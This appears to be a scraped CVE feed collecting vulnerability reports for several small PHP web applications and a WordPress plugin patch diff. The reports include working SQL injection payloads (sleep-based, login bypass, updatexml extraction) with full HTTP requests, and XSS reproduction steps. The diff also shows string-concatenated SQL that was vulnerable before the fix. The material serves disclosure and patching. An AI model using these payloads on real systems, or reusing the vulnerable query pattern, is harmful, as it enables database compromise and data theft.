Technitium DNS Server before 10.0 allows a self-CNAME denial-of-service attack in which a CNAME loop causes an answer to contain hundreds of records.

CVE-2022-48256: DnsServer/CHANGELOG.md at master · TechnitiumSoftware/DnsServer

Online Health Care System v1.0 was discovered to contain a SQL injection vulnerability via the consulting_id parameter at /healthcare/Admin/consulting_detail.php.

Permalink

**Online Health Care System v1.0 by janobe has SQL injection**

BUG\_Author: Peisen Wang

vendors:https://www.sourcecodester.com/php/14526/online-health-care-system-php-full-source-code-2020.html

Vulnerability File: /healthcare/Admin/consulting\_detail.php

Parameter "consulting\_id" (GET), exists delayed injection vulnerability

Payload1: /healthcare/Admin/consulting\_detail.php?consulting\_id=(select\*from(select(sleep(10)))a)

    GET /healthcare/Admin/consulting_detail.php?consulting_id=(select*from(select(sleep(10)))a) HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    

select(sleep(10)), The server response time is 10 seconds

Payload2: /healthcare/Admin/consulting\_detail.php?consulting\_id=(select\*from(select(sleep(20)))a)

    GET /healthcare/Admin/consulting_detail.php?consulting_id=(select*from(select(sleep(20)))a) HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    

select(sleep(20)), The server response time is 20 seconds

CVE-2022-46471: bug_report/SQLi-1.md at main · dreamwonly/bug_report

A cross-site scripting (XSS) vulnerability in Student Study Center Management System V 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.

\> \[Suggested description\]

\> A cross-site scripting (XSS) vulnerability in Student Study Center

\> Management System V 1.0 allows attackers to execute arbitrary web

\> scripts or HTML via a crafted payload injected into the name parameter.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://phpgurukul.com/

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Student Study Center Management System - V 1.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> fromdate

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Attack Vectors\]

\> Steps-To-Reproduce:

\> Step 1 Go to the Product admin panel https://localhost/php-jms/index.php

\> Step 2 " Enter default credentials in username and password

\> Step 3 " After login see Report option and click on report option

\> Step 4 " fill date in From Date and To date input area.

\> Step 5 " Click submit button and capture reauest

\> Step 6 - put XSS payload in From Date input field with date

\> Step 7 - payload execute.

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Sanjay Singh

Use CVE-2022-47102

CVE-2022-47102: CVE-2022-47102/CVE-2022-47102 at main · sudoninja-noob/CVE-2022-47102

Judging Management System v1.0.0 was discovered to contain a SQL injection vulnerability via the username parameter.

\> \[Suggested description\]

\> Judging Management System v1.0.0 was discovered to contain a SQL

\> injection vulnerability via the username parameter.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> SQL Injection

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://www.sourcecodester.com

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Judging Management System - V 1.0.0

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Impact Escalation of Privileges\]

\> true

\>

\> ------------------------------------------

\>

\> \[Attack Vectors\]

\> Go to Login Panel and try to bypass

\>

\> In request payload, set

\>

\> username : 'or''='

\>

\> password : Judging

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Sanjay Singh

Use CVE-2022-46623

CVE-2022-46623: CVE-2022-46623/CVE-2022-46623 at main · sudoninja-noob/CVE-2022-46623

A cross-site scripting (XSS) vulnerability in Doctor Appointment Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Employee ID parameter.

\> \[Suggested description\]

\> A cross-site scripting (XSS) vulnerability in Doctor Appointment

\> Management System v1.0.0 allows attackers to execute arbitrary web

\> scripts or HTML via a crafted payload injected into the Employee ID

\> parameter.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://www.sourcecodester.com

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Doctor Appointment Management System - V 1.0.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> fname

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://phpgurukul.com/doctor-appointment-management-system-using-php-and-mysql/

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Sanjay Singh

Use CVE-2022-45729

CVE-2022-45729: CVE-2022-45729/CVE-2022-45729 at main · sudoninja-noob/CVE-2022-45729

Doctor Appointment Management System v1.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability.

\> \[Suggested description\]

\> Doctor Appointment Management System v1.0.0 was discovered to contain a

\> cross-site scripting (XSS) vulnerability.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://www.sourcecodester.com

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Doctor Appointment Management System - V 1.0.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> fname

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://phpgurukul.com/doctor-appointment-management-system-using-php-and-mysql/

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Sanjay Singh

Use CVE-2022-45728

CVE-2022-45728: CVE-2022-45728/CVE-2022-45728 at main · sudoninja-noob/CVE-2022-45728

A vulnerability was found in SourceCodester Online Food Ordering System 2.0. It has been classified as critical. Affected is an unknown function of the file /fos/admin/ajax.php?action=login of the component Login Page. The manipulation of the argument Username leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-218184.

CVE-2023-0256

A cross-site scripting (XSS) vulnerability in Judging Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter.

\> \[Suggested description\]

\> A cross-site scripting (XSS) vulnerability in Judging Management System

\> v1.0 allows attackers to execute arbitrary web scripts or HTML via a

\> crafted payload injected into the firstname parameter.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://www.sourcecodester.com

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Judging Management System - V 1.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> fname=

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Impact Escalation of Privileges\]

\> true

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Sanjay Singh

Use CVE-2022-46622.

CVE-2022-46622: CVE-2022-46622/CVE-2022-46622 at main · sudoninja-noob/CVE-2022-46622

Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /hss/classes/Users.php?f=delete.

Permalink

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: MAO-qi

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Users.php?f=delete

Vulnerability location: /hss/classes/Users.php?f=delete,id

dbname =hss\_db,length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Users.php?f\=delete HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/hss/admin/?page=user/list
Content-Length: 65
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46472: bug_report/SQLi-1.md at main · MAO-qi/bug_report

The Simple Membership WP user Import plugin for WordPress is vulnerable to SQL Injection via the ‘orderby’ parameter in versions up to, and including, 1.7 due to insufficient escaping on the user supplied parameter. This makes it possible for authenticated attackers with administrative privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Timestamp:

12/06/2022 03:06:57 AM (5 weeks ago)

wp.insider

Message:

v1.8  

Location:

simple-membership-wp-user-import/trunk

Files:

  

*   classes/class.swpm\_wp\_user\_list.php (2 diffs)
*   readme.txt (2 diffs)
*   swpm-wp-import.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **simple-membership-wp-user-import/trunk/classes/class.swpm\_wp\_user\_list.php**
    
    r2029630
    
    r2829005
    
     
    
    75
    
    75
    
            $query = "SELECT \* FROM " . $wpdb->users ;
    
    76
    
    76
    
            if (isset($\_POST\['s'\])){
    
    77
    
     
    
                $query .= " WHERE  user\_login LIKE '%" . strip\_tags($\_POST\['s'\]) . "%' "
    
    78
    
     
    
                        . " OR user\_email LIKE '%" . strip\_tags($\_POST\['s'\]) . "%' "
    
    79
    
     
    
                        . " OR display\_name LIKE '%" . strip\_tags($\_POST\['s'\]) . "%' ";
    
     
    
    77
    
                $query .= " WHERE  user\_login LIKE '%" . sanitize\_text\_field($\_POST\['s'\]) . "%' "
    
     
    
    78
    
                        . " OR user\_email LIKE '%" . sanitize\_text\_field($\_POST\['s'\]) . "%' "
    
     
    
    79
    
                        . " OR display\_name LIKE '%" . sanitize\_text\_field($\_POST\['s'\]) . "%' ";
    
    80
    
    80
    
            }
    
    81
    
     
    
            $orderby = !empty($\_GET\["orderby"\]) ? strip\_tags($\_GET\["orderby"\]) : 'ASC';
    
    82
    
     
    
            $order = !empty($\_GET\["order"\]) ? strip\_tags($\_GET\["order"\]) : '';
    
     
    
    81
    
            $orderby = !empty($\_GET\["orderby"\]) ? sanitize\_text\_field($\_GET\["orderby"\]) : '';
    
     
    
    82
    
            $orderby = $this->sanitize\_value\_by\_array($orderby, $this->get\_sortable\_columns());
    
     
    
    83
    
                   
    
     
    
    84
    
            $order = !empty($\_GET\["order"\]) ? sanitize\_text\_field($\_GET\["order"\]) : 'asc';     
    
     
    
    85
    
            $valid\_order\_parameters = array('asc' => 'ASC', 'desc' => 'DESC');
    
     
    
    86
    
            $order = $this->sanitize\_value\_by\_array($order, $valid\_order\_parameters);
    
     
    
    87
    
    83
    
    88
    
            if (!empty($orderby) & !empty($order)) {
    
    84
    
    89
    
                $query.=' ORDER BY ' . $orderby . ' ' . $order;
    
    …
    
    …
    
     
    
    112
    
    117
    
            \_e('No Member found.');
    
    113
    
    118
    
        }
    
     
    
    119
    
       
    
     
    
    120
    
        /\*\*
    
     
    
    121
    
         \* Checks if the string exists in the array key value of the provided array.
    
     
    
    122
    
         \* If it doesn't exist, it returns the first key element from the valid values.
    
     
    
    123
    
         \* @param type $to\_check
    
     
    
    124
    
         \* @param type $valid\_values
    
     
    
    125
    
         \* @return type
    
     
    
    126
    
         \*/
    
     
    
    127
    
        function sanitize\_value\_by\_array($to\_check, $valid\_values)
    
     
    
    128
    
        {
    
     
    
    129
    
            $keys = array\_keys($valid\_values);
    
     
    
    130
    
            $keys = array\_map('strtolower', $keys);
    
     
    
    131
    
            if (in\_array(strtolower($to\_check), $keys)) {
    
     
    
    132
    
                return $to\_check;
    
     
    
    133
    
            }
    
     
    
    134
    
            return reset($keys); //Return the first element from the valid values
    
     
    
    135
    
        }   
    
    114
    
    136
    
    }
    
*   **simple-membership-wp-user-import/trunk/readme.txt**
    
    r2809306
    
    r2829005
    
     
    
    3
    
    3
    
    Donate link: https://simple-membership-plugin.com/
    
    4
    
    4
    
    Tags: users, wp user, import, export, member, members, membership, access, level
    
    5
    
     
    
    Requires at least: 5.0
    
     
    
    5
    
    Requires at least: 4.0
    
    6
    
    6
    
    Tested up to: 6.1
    
    7
    
     
    
    Stable tag: 1.7
    
     
    
    7
    
    Stable tag: 1.8
    
    8
    
    8
    
    License: GPLv2 or later
    
    9
    
    9
    
    …
    
    …
    
     
    
    36
    
    36
    
    \== Changelog ==
    
    37
    
    37
    
     
    
    38
    
    \= 1.8 =
    
     
    
    39
    
    \* Fixed an SQL injection issue in the orderby parameter.
    
     
    
    40
    
    38
    
    41
    
    \= 1.7 =
    
    39
    
    42
    
    \* Fixed members import issue.
    
    40
    
     
    
    \* Addon is now uses WP built-in jQuery datepicker.
    
     
    
    43
    
    \* Addon now uses WP built-in jQuery datepicker.
    
    41
    
    44
    
    42
    
    45
    
    \= 1.6 =
    
*   **simple-membership-wp-user-import/trunk/swpm-wp-import.php**
    
    r2029630
    
    r2829005
    
     
    
    6
    
    6
    
    Author: wp.insider
    
    7
    
    7
    
    Author URI: https://simple-membership-plugin.com/
    
    8
    
     
    
    Version: 1.7
    
     
    
    8
    
    Version: 1.8
    
    9
    
    9
    
    \*/
    
    10
    
    10
    
    11
    
    11
    
    //Slug swmp\_wpimport\_
    
    12
    
    12
    
    13
    
     
    
    define( 'SWPM\_WP\_IMPORT\_VERSION', '1.7' );
    
     
    
    13
    
    define( 'SWPM\_WP\_IMPORT\_VERSION', '1.8' );
    
    14
    
    14
    
    define('SWPM\_WP\_IMPORT\_PATH', dirname(\_\_FILE\_\_) . '/');
    
    15
    
    15
    
    define('SWPM\_WP\_IMPORT\_URL', plugins\_url('',\_\_FILE\_\_));
    

**Note:** See TracChangeset for help on using the changeset viewer.

Tag

#sql